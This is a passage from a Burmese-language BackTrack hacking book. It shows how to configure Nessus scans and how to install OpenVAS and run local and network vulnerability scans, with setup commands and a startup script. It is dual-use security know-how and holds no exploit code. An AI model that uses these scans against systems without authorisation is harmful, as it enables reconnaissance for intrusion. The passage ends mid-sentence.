i. Scan လုပ္မည္႕အမည္ကို ရိုက္ထည္႕ေပးရပါမည္။ ၄င္းသည္ တစ္ခ်ိန္တည္းတြင္ Scan


တစ္ခုထက္ပိုမိုျပဳလုပ္လိုပါက အသံုး၀င္ႏိုင္မည္ျဖစ္သည္။ ထိ႕ု အျပင္ လက္ရိွအသံုးျပဳေနေသာ
Scan မ်ားမွ ကြျဲ ပားထင္ရွားေစပါသည္။

မ်က္ပြင့္စာေပ 97
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ii. Scan အမ်ိဳးအစားကို သတ္မွတ္ေပးရပါမည္။


 Run Now : ပံုမွန္အားျဖင့္ Enable ျပဳလုပ္ၿပီးသားျဖစ္တတ္ပါသည္။ ထို Option သည္
Scan ကို ခ်က္ခ်င္းပင္စတင္ေစႏိုင္ပါသည္။
 Scheduled : ၄င္း Option သည္ Scan ျပဳလုပ္ႏိုင္မည္႕ ေန႕ရက္၊ အခ်ိန္မ်ားကို သတ္
မွတ္ေပးေစႏိုင္ပါမည္။
 Template : Template အေနျဖင့္ သတ္မွတ္ႏိုင္ရန္အတြက္ လုပ္ေဆာင္ေပးေစႏိုင္သည္။
iii. Scan Policy ကုိသတ္မွတ္ေပးရပါမည္။ ယခုေနရာတြင္ ယခင္ျပဳလုပ္နာမည္ေပးထားခဲ့ေသာ
Windows Vulnerabilities Policy ကိုသာသတ္မွတ္ေပးရပါမည္။
iv. Target ကိုေရြးခ်ယ္ရန္အတြက္ေအာက္ပါအခ်က္မ်ားကို သတိမူေပးရပါမည္။
 Target မ်ားကို လိုင္းတစ္လိုင္းတြင္ တစ္ခုသာ ထားေပးရပါမည္။
 လိုင္းတစ္လိုင္းလွ်င္လည္း Target တစ္ခုစီ၏ Range မ်ားကိုလည္းသတ္မွတ္ေပးရပါ မည္။
 အကယ္၍ရိွခဲ့လွ်င္ Target မ်ား၏ ဖိုင္တစ္ဖိုင္ကိုလည္း Upload ျပဳလုပ္ေပးရပါမည္။
သို႕တည္းမဟုတ္ Add Target IP Address ကို ေရြးခ်ယ္ေပးရပါမည္။

၉။ Launch Scan ကို Click ႏိွပ္ေပးရပါမည္။

၁၀။ ထိုအခါ Confirmation တစ္ခုကို ေတြ႕ျမင္ရမည္ျဖစ္သည္။ ထို႕ေနာက္တြင္ Test သည္လည္း ၿပီးဆံုး


မည္ျဖစ္ပါသည္။ (Target မ်ားမည္မွ် အသံုးျပဳေရြးခ်ယ္ထားသည္ ဆိုသည္႕အခ်က္ႏွင့္ Test မ်ား၏
Number အေပၚတြင္လည္း မူတည္ႏိုင္ပါသည္)

၁၁။ ၿပီးဆံုးေသာအခါတြင္ Report တစ္ခုကို ရရိွမည္ျဖစ္သည္။

98 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၂။ ေအာက္ပါအခ်က္မ်ားကို Analyze ျပဳလုပ္ရန္အတြက္ ရရိွလာေသာ Report ေပၚတြင္ Double Click


ႏိွပ္ေပးရပါမည္။

i. Target တစ္ခုစီအတြက္ ရွာေဖြေတြ႕ရိွထားေသာ Vulnerability မ်ားကို List လုပ္ေဖာ္ျပေပးပါ


မည္။
ii. Port မ်ားကို ၾကည္႕ရွဳရန္ႏွင့္ Port တစ္ခုစီတြင္ရိွေသာ အေၾကာင္းအရာမ်ားကို သိရိွႏိုင္ေစရန္
IP Address ေပၚတြင္ Double Click ႏိွပ္ေပးရပါမည္။
iii. ေဖာ္ျပပါ အျခင္းအရာမ်ား၊ ေတြ႕ရိွရသည္႕ ယိုေပါက္မ်ားကို ရရိွႏိုင္ေစရန္အတြက္ Severity
Level Column မ်ား (Total, High, Medium သို႕မဟုတ္ Low) ေအာက္မွ နံပါတ္မ်ားတြင္ Click
ႏိွပ္ျခင္းျဖင့္ ၾကည္႕ရွဳႏိုင္ပါသည္။

၁၃။ Reports Main Menu မွ Download Report တြင္ Click ႏိွပ္ေပးရပါမည္။

Installing, Configuring, and Starting Open-


VAS
OpenVAS ဟုေခၚတြင္ေသာ Open Vulnerability Assessment System သည္ အေကာင္းဆံုးေသာ
framework တစ္ခုျဖစ္ၿပီး ၄င္းသည္ Target တစ္ခု၏ Vulnerabilities မ်ားကို ၀င္ေရာက္ရန္အတြက္
အသံုးျပဳႏိုင္ပါသည္။ ၄င္းသည္ Nessus Project ၏ မူကတ
ြဲ စ္ခုလည္းျဖစ္သည္။ Nessus ႏွင့္မတူေသာ
အခ်က္မွာ OpenVAS သည္ အခမဲ့အျဖစ္ အျပည္႕အ၀အသံုးျပဳခြင့္ရိွေသာအခ်က္ပင္ျဖစ္ပါသည္။ OPenVAS
သည္ BackTrack 5 တြင္ Standard Installation အေနျဖင့္ အဆင္သင့္ပါလာေလ့ရိွပါသည္။ ထို႕ေၾကာင့္
OpenVAS ၏ Configurationလုပ္ေဆာင္ပံုကိုေလ့လာၾကည္႕ၾကပါမည္။ ယခုလုပ္ေဆာင္ခ်က္မ်ားၿပီးျပည္႕
စံုစြာ ျပဳလုပ္ႏိုင္ရန္အတြက္ Internet ကိုအသံုးျပဳရပါမည္။ OpenVAS ကို Install ျပဳလုပ္ျခင္း၊ Configre
ျပဳလုပ္ျခင္း၊ OpenVAS ကို စတင္ျခင္းစသည္တို႕ျပဳလုပ္ရန္အတြက္ OpenVAS ကုိအသံုးျပဳထား ေသာ
Directory မွတဆင့္ Terminal Window ေပၚတြင္အသံုးျပဳရပါမည္။

၁။ OpenVAS ကို ပံုမွန္အားျဖင့္ Install ျပဳလုပ္ထားၿပီးျဖစ္ေသာေၾကာင့္ အလိုရိွရာအသံုးျပဳႏိုင္ရန္အတြက္


Configure ျပဳလုပ္ရန္သာလိုအပ္ပါသည္။

မ်က္ပြင့္စာေပ 99
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Terminal Window မွတစ္ဆင့္ OpenVAS ရိွသည္႕ Directory သို႕ေအာက္ပါ Command ကိုအသံုးျပဳ


၍ ေျပာင္းလဲရပါမည္။

cd /pentest/misc/openvas/

၃။ ထို႕ေနာက္ ေအာက္တြင္ေဖာ္ျပပါ Command ကို Execute ျပဳလုပ္ရပါမည္။

openvas-mkcert

ယခုအဆင့္တြင္ OpenVAS Program အတြင္ SSL Certificate ကိုဖန္တီးျခင္းလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္


ရျခင္းျဖစ္ေသာေၾကာင့္

i. CA certificate ၏ နဂိုမူလ Lifetime သာအသံုးျပဳရပါမည္။


ii. CA Certificate :1460 ၏ ေန႕ရက္အေရအတြက္ႏွင့္ ကိုက္ညီေစရန္အတြက္ Certificate
lifetime ကို Update ျပဳလုပ္ေပးရပါမည္။
iii. Country တစ္ခုခုကို သတ္မွတ္ေပးရပါမည္။
iv. ဆႏၵရိွပါက ျပည္နယ္ သိ႕ု မဟုတ္ တိုင္းေဒသႀကီး စသည္တို႕ကို ေရြးခ်ယ္ေပးႏိုင္ပါသည္။
v. Organization Name ကို မူလအတိုင္းသာ ထားေပးရပါမည္။
vi. ေအာက္တြင္ေဖာ္ျပထားသည္႕အတိုင္း Certificate Confirmation Screen ကိုေဖာ္ျပေပးမည္
ျဖစ္သည္။

၄။ ေအာက္ပါ Command ကိုလည္း Execute ျပဳလုပ္ေပးရပါမည္။

100 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

openvas-nvt-sync

အထက္ပါ Command သည္ လက္ရိွ NVT Feed မွ OpenVAS NVT database ကို Sync ျပဳလုပ္ရန္ျဖစ္
ပါသည္။ ၄င္းသည္ ေခတ္အမီွဆံုး Vulnerability စစ္ေဆးျခင္းကို ျပဳလုပ္ၿပီး တစ္လက္စတည္းအေနျဖင့္
Update ကိုပါ တစ္ခါတည္း ျပဳလုပ္ေပးပါလိမ့္မည္။

၅။ ထို႕ေနာက္ ေအာက္ပါ Command မ်ားကိုလည္း Execute ျပဳလုပ္ေပးရပါမည္။

openvas-mkcert-client –n om –i

openvasmd –rebuild

၄င္း Command အရ Client Certificate ကို ထုတ္ေပးမည္ျဖစ္ၿပီး Database ကိုလည္း အသီးသီး ျပန္လည္
တည္ေဆာက္ေပးပါလိမ့္မည္။

၆။ ထို႕အျပင္ ေအာက္ပါ Command ကိုလည္း ရိုက္ထည္႕ေပးရပါမည္။

openvassd

မ်က္ပြင့္စာေပ 101
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ယင္း Command အရ OpenVAS Scanner ကိုစတင္ေပးမည္ျဖစ္ၿပီး အားလံုးေသာ Plugin မ်ား


(အားလံုးေပါင္း 26406 ခုခန္႕ရိွပါသည္) ကိုလည္း Load ျပဳလုပ္ေပးပါလိမ့္မည္။ ထို႕ေၾကာင့္ အခ်ိန္အနည္း
ငယ္ခန္႕ ၾကာျမင့္ႏိုင္ပါသည္။

၇။ ထို႕ေနာက္ ေအာက္ပါ Command မ်ားကိုလည္း ရိုက္ထည္႕ေပးရပါမည္။

openvasmd --rebuild

openvasmd --backup

အထက္တြင္ေဖာ္ျပခဲ့ေသာ Command မ်ားအရ Database ၏ Backup ကို တည္ေဆာက္ေပးၿပီးေနာက္


Rebuild လုပ္ေၾကာင္း သိရိွရပါမည္။

၈။ Administrative user (openvasadmin ကိုအသံုးျပဳသည္) ကို တည္ေဆာက္ႏိုင္ရန္အတြက္ ေအာက္ပါ


Command ကိုရိုက္ထည္႕ေပးရပါမည္။

openvasad –c ‘add_user’ –n openvasadmin –r admin

၉။ ေအာက္ပါ Command ကိုလည္း ရိုက္ထည္႕ေပးရပါမည္။

openvas-adduser

အထက္တြင္လုပ္ေဆာင္ရမည္႕ Command သည္ ပံုမွန္ User Account တစ္ခုကို တည္ေဆာက္ရန္


အတြက္ျဖစ္သည္။ ထို႕ေၾကာင့္ ေအာက္တြင္ေဖာ္ျပထားေသာ အဆင့္မ်ားကိုေလ့လာျခင္းျဖင့္ User
Account တစ္ခုကိုလြယ္ကူစြာထည္႕သြင္းေပးႏိုင္ပါသည္။

i. Login name ကိုထည္႕သြင္းေပးရပါမည္။


ii. Authentication Request ေပၚတြင္ Enter ႏိွပ္ေပးရပါမည္။ (၄င္းသည္ အလိုအေလွ်ာက္ပင္
Password ကိုေရြးခ်ယ္ေပးပါသည္)
iii. Password ကို ႏွစ္ႀကိမ္တိုင္တိုင္ ရိုက္ထည္႕ေပးရပါမည္။

102 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

iv. စည္းမ်ဥ္းမ်ားအတြက္ Ctrl +D ကိုႏိွပ္ပါ။


v. User ကို ထည္႕သြင္းရန္အတြက္ y ကိုႏိွပ္ပါ။

၁၀။ OpenVAS တြင္အသံုးျပဳေသာ Port မ်ားကို Configure ျပဳလုပ္ရန္အတြက္ ေအာက္ပါ Command


ကိုအသံုးျပဳရပါမည္။

openvasmd –p 9390 –a 127.0.0.1

openvasad –a 127.0.0.1 –p 9393

gsad – http-only –listen=127.0.0.1 –p 9392

မွတ္ရန္။ ။9392 သည္ Web Browser အတြက္ အႀကံျပဳထားေသာ Port ျဖစ္ေသာ္လည္း မိမိ၏
ဆႏၵျဖင့္ ေရြးခ်ယ္အသံုးျပဳႏိုင္ပါသည္။

၁၁။ OpenVAS Web Interface တြင္ ၾကည္႕ရွဳႏိုင္ရန္အတြက္ Browser ေပၚတြင္ http://127.0.0.1


:9392 သိ႕ု သြားေရာက္ရပါမည္။

မ်က္ပြင့္စာေပ 103
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

ယခုအပိုင္းတြင္ Terminal Window ကိုဖြင့္ၿပီး OpenVAS ကို Install လုပ္ျခင္းျဖင့္ စတင္ထားပါသည္။


ထို႕ေနာက္ Certificate ကို ဖန္တီးၿပီးေနာက္ Plugin Database ကိုလည္း Install ျပဳလုပ္ခဲ့ၾကပါသည္။
ထို႕ေနာက္ Administrative User တစ္ခုႏွင့္ ပံုမွန္ User Account တစ္ခုကိုလည္းဖန္တီးခဲ့ၾကပါသည္။
ေနာက္ဆံုးတြင္ OpenVAS ၏ Web Interface ကို၀င္ေရာက္ၿပီးေနာက္ Login Screen သို႕ေရာက္ေအာင္
အထိ လုပ္ေဆာင္ခဲ့ၾကပါသည္။

မွတ္ရန္။ ။ OpenVAS ႏွင့္ လုပ္ေဆာင္ခ်က္တစ္ခုကိုလုပ္ေဆာင္သည္႕အခ်ိန္တိုင္းတြင္ Database


ကို ျပန္လည္ Rebuild လုပ္ေဆာင္ေပးရန္လိုအပ္မည္ျဖစ္သည္။

ဆက္လက္၍ ေအာက္ေဖာ္ျပပါမ်ားကုိလည္း သိရိွနားလည္ထားရပါမည္။

OpenVAS ကို ေမာင္းႏွင္လိုသည္႕အခ်ိန္တိုင္းတြင္ ေအာက္ပါတို႕ကိုလုပ္ေဆာင္ေပးထားရန္လိုအပ္ပါမည္။

၁။ NVT Feed ကို Sync ျပဳလုပ္ရပါမည္။ (ထိုသို႕လုပ္ေဆာင္ထားျခင္းျဖင့္ Vulnerability မ်ားအသစ္ထြက္


တိုင္းတြင္ သိရိွႏိုင္မည္ျဖစ္သည္)

104 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ OpenVAS Scanner ကို စတင္ရပါမည္။

၃။ Database ကို Rebuild ျပန္လုပ္ေပးရပါမည္။

၄။ Database ကို Backup ျပဳလုပ္ေပးရပါမည္။

၅။ Port မ်ားကို Configure ျပဳလုပ္ေပးရပါမည္။

အခ်ိန္ကုန္သက္သာေစရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားေသာ Bash Script တစ္ခုကို OpenVAS.sh


ျဖင့္ /root folder တြင္သိမ္းဆည္းထားရပါမည္။ ထုိသို႕ျပဳလုပ္ျခင္းျဖင့္ OpenVAS ကိုအခ်ိန္မကုန္ေစပဲ
စတင္ေစႏိုင္ပါမည္။

#!/bin/bash
openvas-nvt-sync
openvassd
openvasmd --rebuild
openvasmd --backup
openvasmd -p 9390 -a 127.0.0.1
openvasad -a 127.0.0.1 -p 9393
gsad --http-only --listen=127.0.0.1 -p 9392

Using the OpenVAS Desktop


ယခုအပိုင္းတြင္ အထက္တြင္ေဖာ္ျပထားေသာအဆင့္ႏွင့္တူညီေသာ OpenVAS Desktop မွ အသံုးျပဳျခင္း
ကိုေဖာ္ျပေပးမည္ျဖစ္သည္။ OpenVAS Desktop သည္ GUI based application တစ္ခုလည္းျဖစ္သည္။
Application ကိုစတင္ႏုိင္ရန္အတြက္ ေအာက္တြင္ေဖာ္ျပထားသည္႕အဆင့္အတိုင္းျပဳလုပ္ႏိုင္ပါသည္။

၁။ BackTrack ၏ Desktop တြင္ရိွေသာ Start Menu မွတစ္ဆင့္ Applications> BackTrack>


Vulnerability Assessment> Vulnerability Scanners> OpenVAS> Start GreenBone Security
Desktop သို႕အဆင့္ဆင့္ေရြးခ်ယ္ေပးရပါမည္။

မ်က္ပြင့္စာေပ 105
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Server Address အျဖစ္ 127.0.0.1 ကိုသတ္မွတ္ေပးရပါမည္။

၃။ Username သတ္မွတ္ေပးရပါမည္။

၄။ Password သတ္မွတ္ေပးရပါမည္။

၅။ ထို႕ေနာက္ Log In ခလုတ္ေပၚတြင္ Click ႏိွပ္ပါ။

OpenVAS – finding local Vulnerabilities


ယခုအပိုင္းတြင္ attack ျပဳလုပ္မည္႕ Target အတြက္ Local Vulnerability မ်ားကိုရွာေဖြရန္အတြက္
OpenVAS ကိုအသံုးျပဳျခင္းကိုေလ့လာရပါမည္။ ယခုအပိုင္းကိုေလ့လာရန္အတြက္ Mozilla Firefox ကို
ဖြင့္၍ လုပ္ေဆာင္ရမည္ျဖစ္ေသာေၾကာင့္

၁။ http://127.0.0.1:9392 သို႕သြားေရာက္ကာ OpenVAS ကို Log in ျပဳလုပ္ပါ။

106 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၂။ Configuration> Scan Configs ကိုေရြးခ်ယ္ပါ။

၃။ Scan ျပဳလုပ္မည္႕ အမည္ကိုေရြးခ်ယ္ေပးရပါမည္။ ယခုေနရာတြင္ Local Vulnerabilities ဟုသံုးစြပ


ဲ ါ
မည္။

၄။ Base အတြက္ Empty> Static and fast Option ကိုေရြးခ်ယ္ေပးရပါမည္။ ၄င္း Option သည္ Scratch
မွ စတင္ရန္ႏွင့္ ကိုယ္ပိုင္ Configuration ျပဳလုပ္ရန္အတြက္ ခြင့္ျပဳေပးမည္ျဖစ္ပါသည္။

၅။ Create Scan Config တြင္ Click ႏိွပ္ပါ။

၆။ Scan Config ကိုျပင္ဆင္လိုေသာအခါ Local Vulnerabilities ေဘးမွ Wrench Icon ေပၚတြင္ Click
ႏိွပ္ပါ။

ြဲ ိွပ္ၿပီးေအာင္ Find Bar ထဲတြင္ Local ဟုရိုက္ထည္႕ပါ။


၇။ Ctrl + F ကိုတႏ

မ်က္ပြင့္စာေပ 107
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၈။ ေတြ႕ရိွေသာ Local Family တစ္ခုစီအတြက္ Select all NVT box တြင္ အမွန္ျခစ္ျပဳလုပ္ေပးရပါမည္။
Family ဆိုသည္မွာ Vulnerability မ်ား၏ အစုအေ၀းပင္ျဖစ္ပါသည္။ ေရြးခ်ယ္ရမည္႕ Vulnerability မ်ားမွာ

 Compliance
 Credentials
 Default Accounts
 Denial of Service
 FTP
 Ubuntu Local Security Checks

၉။ Save Config တြင္ Click ႏိွပ္ပါ။

၁၀။ Configuration>Targes သို႕ဆက္လက္ေရြးခ်ယ္ေပးရပါမည္။

108 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၁။ New Target တစ္ခုကိုဖန္တီးေပးရပါမည္။ ထိ႕ု ေနာက္ ေအာက္တြင္ေဖာ္ျပထားေသာ Task မ်ားကို


ျပဳလုပ္ေပးရပါမည္။

i. Target ၏ အမည္ကို ရိုက္ထည္႕ေပးရပါမည္။


ii. Hosts ကိုလည္း ေအာက္တြင္ေဖာ္ျပထားေသာ နည္းလမ္းတစ္ခုခုျဖင့္ သတ္မွတ္ေပးရပါမည္။
a. Address ကိုထည္႕သြင္းျခင္း
ဥပမာ - 192.168.0.10
b. Address အမ်ားႀကီးကို Comma ခံ၍ ထည္႕သြင္းျခင္း
ဥပမာ - 192.168.0.10, 192.168.0.115
c. Address ၏ Range ကိုသတ္မွတ္ျခင္း
ဥပမာ - 192.168.0.1-20

၁၂။ Create Target တြင္ Click ႏိွပ္ပါ။

၁၃။ ထို႕ေနာက္ Scan Management> New Task ကိုေရြးခ်ယ္ၿပီးေနာက္ ေအာက္တြင္ေဖာ္ျပထားေသာ


အလုပ္မ်ားကိုလုပ္ေဆာင္ေပးရပါမည္။

i. Task ၏အမည္ကို ရိုက္ထည္႕ေပးရပါမည္။


ii. Comment ရိုက္ထည္႕ေပးရပါမည္။ (မရိုက္ထည္႕လွ်င္လည္းရပါသည္)
iii. Scan Configurtion ကိုေရြးခ်ယ္ေပးရပါမည္။ ဤေနရာတြင္ Local Vulnerabilities ျဖစ္ပါ
သည္။
iv. Scan Targets ကိုသတ္မွတ္ေပးရပါမည္။ ယခုေနရာတြင္ Local Network ကိုအသံုးျပဳထားပါ
သည္။
v. အျခားေသာ Option မ်ားကိုေျပာင္းလဲရန္မလိုအပ္ဘဲ မူလအတိုင္းသာထားေပးရပါမည္။
vi. Create Task တြင္ Click ႏိွပ္ပါ။

မ်က္ပြင့္စာေပ 109
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၄။ ထို႕ေနာက္ Scan Management> Tasks ကိုေရြးခ်ယ္ပါ။

၁၅။ Scan ျပဳလုပ္ရန္အတြက္ Play Button တြင္ Click ႏိွပ္ပါ။ ယခုေနရာတြင္ Local Vulnerabilities Scan
ျဖစ္သည္ကို သတိထားရပါမည္။

ယခုအပိုင္းတြင္ OpenVAS ကို ဖြင့္၍ Web Based Interface တြင္ Log In ၀င္ေရာက္ျခင္းကို ျပဳလုပ္ခဲ့ၾက
ပါသည္။ ထို႕ေနာက္ OpenVAS ကို Local Vulnerabilities ကို ရွာေဖြရန္အတြက္ Configure ျပဳလုပ္ရပါ
မည္။ ေနာက္ဆံုးအေနျဖင့္ Target ကိုေရြးခ်ယ္ကာ Scan ကို ၿပီးဆံုးေအာင္အထိ ျပဳလုပ္ပံုကို ေဖာ္ျပခဲ့ပါ
သည္။ OpenVAS သည္ NVT Feed အပါအ၀င္ သိရိွၿပီးေသာ Vulnerabilities မ်ားကို List ျပဳလုပ္ရန္ Scan
ျပဳလုပ္ရမည္ျဖစ္သည္။

Scan ျပဳလုပ္ျခင္းကို လုပ္ေဆာင္ၿပီးေသာအခါ Report ကိုၾကည္႕ျခင္းျဖင့္ Result မ်ားကိုေတြ႕ျမင္ႏိုင္ပါ


သည္။ ထိုသို႕ျပဳလုပ္ရန္အတြက္

၁။ Scan Management> Tasks သို႕သြားေရာက္ရပါမည္။

၂။ Local Vulnerabilities Scan ေဘးတြင္ရိွေသာ ခရမ္းေရာင္ Magnifying Glass (မွန္ဘီလူးပံု) တြင္ Click
ႏိွပ္ေပးရပါမည္။
110 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၃။ Report ကိုၾကည္႕ရန္အတြက္ Download Arrow တြင္ Click ႏိွပ္ေပးရပါမည္။



မ်က္ပြင့္စာေပ 111
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

OpenVAS – finiding network vulnerabilities


ယခုအပိုင္းတြင္ OpenVAS ကိုအသံုးျပဳ၍ Network Vulnerability မ်ားရွာေဖြျခင္းကို ေဖာ္ျပေပးမည္ျဖစ္
သည္။ ယခုအပိုင္းကို စမ္းသပ္ႏိုင္ရန္အတြက္ Virtual Machine လိုအပ္မည္ျဖစ္ၿပီး ေအာက္တြင္
ေဖာ္ျပထားေသာ System မ်ားကိုအသံုးျပဳႏိုင္မည္ျဖစ္သည္။

 Windows XP
 Windows 7
 Metasploitable 2
 Any Other Flavor of Linux

စတင္လုပ္ေဆာင္ရန္အတြက္ Mozilla Firefox ကဲ့သို႕ေသာ Browser ကိုအသံုးျပဳရမည္ျဖစ္ပါသည္။

၁။ http://127.0.0.1:9392 သို႕သြားေရာက္ၿပီး OpenVAS ကို Login ျပဳလုပ္ရပါမည္။

၂။ Configuration> Scan Configs ကိုေရြးခ်ယ္ေပးရပါမည္။

၃။ Scan ျပဳလုပ္ရာတြင္အသံုးျပဳမည္႕အမည္ကို သတ္မွတ္ေပးရပါမည္။ ယခုအပိုင္းတြင္ Network


Vulnerabilities ဟူေသာအမည္ကိုအသံုးျပဳမည္ျဖစ္ပါသည္။

၄။ Base အတြက္ Empty> Static and Fast Option ကိုေရြးခ်ယ္ေပးရပါမည္။ ထို Option သည္ Scratch
မွ စတင္ရန္ႏွင့္ ကိုယ္ပိုင္ Configuration ျပဳလုပ္ျခင္းကို လုပ္ေဆာင္ေစႏိုင္မည္ျဖစ္ပါသည္။

၅။ Create Scan Config တြင္ Click တစ္ခ်က္ႏိွပ္ေပးရပါမည္။

112 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၆။ ထိ႕ု ေနာက္ Scan Config ကို Edit ျပဳလုပ္ရန္လိုအပ္ပါမည္။ Network Vulnerabilities ေဘးတြင္ရိွ ေသာ
Wrench Icon ကို Click ႏိွပ္ေပးရပါမည္။

၇။ Ctrl +F ကိုတႏ
ြဲ ိွပ္ၿပီး Find Bar တြင္ Network ဟုရိုက္ထည္႕ေပးရပါမည္။

၈။ ရွာေဖြေတြ႕ရိွေသာ Family တစ္ခုစီအတြက္ Select all NVT box ကို အမွန္ျခစ္ေပးေရြးခ်ယ္ေပးထားရ


ပါမည္။ Family တစ္ခုသည္ Vulnerabilities အစုအေ၀းတစ္ခုျဖစ္သည္႕အတြက္ ေရြးခ်ယ္ႏိုင္ေသာ
Vulnerabilities မ်ားမွာ

 Brute force attacks


 Buffer overflow
 CISCO
 Compliance
 Credentials
 Databases
 Default Accounts
 Denial of Service
 FTP
 Finger abuses
 Firewalls
 Gain a shell remotely
 General
 Malware

မ်က္ပြင့္စာေပ 113
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

 Netware
 NMAP NSE
 Peer-To-Peer File Sharing
 Port Scanners
 Privilege Escalation
 Product Detection
 RPC
 Remote File Access
 SMTP Problems
 SNMP
 Service detection
 Settings
 Wireless Services တို႕ျဖစ္သည္။

၉။ Save Config တြင္ Click ႏိွပ္ပါ။

114 မ်က္ပြင့္စာေပ
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

၁၀။ Configuation>Targets သို႕သြားေရာက္ရမည္။

၁၁။ Target အသစ္တစ္ခုဖန္တီးရပါမည္။ ထို႕ေနာက္ ေအာက္ပါလုပ္ေဆာင္ခ်က္မ်ားကို လုပ္ေဆာင္ေပးရ


ပါမည္။

i. Target ၏ အမည္ကိုသတ္မွတ္ေပးရမည္။
ii. Hosts ကိုသတ္မွတ္ႏိုင္ရန္အတြက္ ေအာက္ပါ နည္းလမ္းတစ္မ်ိဳးမ်ိဳးကို အသံုးျပဳရပါမည္။
 Address ကိုထည္႕သြင္းျခင္း
ဥပမာ - 192.168.0.10
 Address မ်ားကို Comma ခံၿပီးထည္႕သြင္းျခင္းျဖင့္ျဖစ္ေစ
ဥပမာ - 192.168.0.10ယ 192.168.0.115
 Adddress ၏ Range ကိုသတ္မွတ္ေပးျခင္းျဖင့္ျဖစ္ေစ
ဥပမာ - 192.168.0.1-20

၁၂။ Save Target တြင္ Click ႏိွပ္ေပးရပါမည္။

၁၃။ ထို႕ေနာက္ Scan Management> New Task တြင္ေရြးခ်ယ္ပါ။ ေအာက္ပါလုပ္ေဆာင္ခ်က္မ်ားကို


ထပ္မံလုပ္ေဆာင္ေပးရပါမည္။

i. Task ၏အမည္ကို သတ္မွတ္ေပးရပါမည္။


ii. Comment ကိုေပးခ်င္လွ်င္ေပးႏို္င္ပါသည္။
iii. Scan Configuation ကိုသတ္မွတ္ေပးရပါမည္။ ယခုအပိုင္းတြင္မူ Network Vulnerabilities
ဟုသံုးႏႈန္းထားပါသည္။

မ်က္ပြင့္စာေပ 115
ရဲမင္းေအာင္(Ray-Electronic) BACKTRACK ကိုအသံုးျပဳ၍ အဆင့္ျမင့္ HACKING ျပဳလုပ္နည္းမ်ား

iv. Scan Target မ်ားကိုသတ္မွတ္ေပးရပါမည္။ ယခုအပိုင္းတြင္မူ Local Network ဟုသတ္မွတ္


ေပးထားပါသည္။
v. အျခားေသာ Option မ်ားကိုမူ ေျပာင္းလဲရန္မလိုပါ။
vi. Create Task တြင္ Click ႏိွပ္ပါ။

၁၄။ Scan Management>Tasks ကိုေရြးခ်ယ္ေပးရပါမည္။

၁၅။ Scan ျပဳလုပ္ရန္အတြက္ Play ခလုတ္ကို Click ႏိွပ္ေပးရပါမည္။ ယခုအပိုင္းတြင္ Network


Vulnerabilities Scan ဆုိေသာအခ်က္ကိုမူ သတိထားရပါမည္။

ယခုအပိုင္းတြင္ OpenVAS ကို Launch ျပဳလုပ္ၿပီး Web-based Interface ကို Log int ျပဳလုပ္ျခင္းကို
လုပ္ေဆာင္ေပးခဲ့ၾကပါသည္။ Network Vulnerabilities မ်ားကို ရွာေဖြရန္အတြက္ OpenVAS ကို
Configure ျပဳလုပ္ျခင္းကို လုပ္ေဆာင္ခဲ့ပါသည္။ ေနာက္ဆံုးတြင္ Target ကိုေရြးခ်ယ္ၿပီးေနာက္ Vulner-
